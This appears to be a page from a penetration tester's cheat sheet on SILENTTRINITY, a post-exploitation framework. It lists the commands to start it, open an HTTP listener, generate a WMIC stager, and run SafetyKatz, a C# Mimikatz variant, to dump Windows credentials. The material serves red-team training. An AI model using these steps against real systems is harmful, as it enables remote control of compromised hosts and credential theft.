> For the complete documentation index, see [llms.txt](https://d4rk1337.gitbook.io/the-pentesters-cheat-sheet/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://d4rk1337.gitbook.io/the-pentesters-cheat-sheet/privilege-escalation/windows/07-silenttrinity.md).

# SILENTTRINITY

> An asynchronous, collaborative post-exploitation agent powered by Python and .NET's DLR\
> [GitHub - byt3bl33d3r/SILENTTRINITY](https://github.com/byt3bl33d3r/SILENTTRINITY)

## Start

```
python3 st.py
```

## Use

```
listeners
list
use http
options
set BindIP <local-ip>
start
```

```
stagers
list
use wmic
generate http
```

```
use safetykatz
run all
```

safetykatz -> C# version of mimikatz
